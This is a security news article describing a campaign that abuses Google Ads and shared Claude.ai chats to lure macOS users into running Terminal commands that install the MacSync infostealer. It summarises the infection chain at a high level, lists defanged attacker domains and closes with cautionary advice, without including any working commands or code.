Hackers Abuse Google Ads and Claude.ai Chats to Distribute Mac Malware
Attackers are leveraging Google Ads and weaponized Claude.ai shared chats to trick macOS users into executing malicious terminal commands that install infostealers.

Threat actors are actively abusing Google Ads and legitimate shared Claude.ai chat links to distribute malware to macOS users. By purchasing sponsored search results for terms like "Claude mac download," attackers redirect unsuspecting users to malicious Claude.ai shared chats that masquerade as official installation guides, often attributed to "Apple Support" BleepingComputer.
The attack relies on social engineering, where the shared chat instructs users to open the macOS Terminal and execute a provided command. This command triggers a multi-stage infection process. The initial payload is a base64-encoded shell script that fetches a secondary, Gunzip-compressed script. This secondary script is designed to run entirely in memory, a technique that minimizes the malware's footprint on the victim's disk and complicates detection BleepingComputer.
The campaign exhibits sophisticated, polymorphic delivery, where the server generates a uniquely obfuscated version of the payload for every request to evade signature-based security tools. Furthermore, the malware performs victim profiling; one observed variant checks for Russian or CIS-region keyboard layouts, exiting silently if detected to avoid targeting users in those regions. Before executing the final payload, the script exfiltrates system information, including the victim's external IP address, hostname, OS version, and keyboard locale BleepingComputer.
Once the environment is deemed suitable, the attackers gain remote code execution via osascript, the built-in macOS scripting engine. One variant identified by security researcher Berk Albayrak was observed harvesting sensitive data, including browser credentials, cookies, and contents from the macOS Keychain, before exfiltrating the information to an attacker-controlled server. Albayrak identified this specific payload as a variant of the MacSync infostealer BleepingComputer.
As of the latest reports, multiple distinct infrastructures are being used to support this campaign, with researchers identifying different domains and payloads, such as customroofingcontractors[.]com and bernasibutuwqu2[.]com, serving the malicious scripts. While some domains associated with the campaign have already gone offline, the use of legitimate platforms like Google Ads and Claude.ai to facilitate the initial compromise remains a significant threat BleepingComputer.
This campaign highlights a growing trend of attackers weaponizing trusted platforms and legitimate services to bypass traditional security filters. By leveraging the credibility of Google search results and the interactive nature of AI-generated chat sessions, threat actors can effectively deceive users into performing dangerous actions on their own systems. Users are advised to exercise extreme caution when following installation instructions found in search results or shared chat links, even when they appear to originate from reputable services BleepingComputer.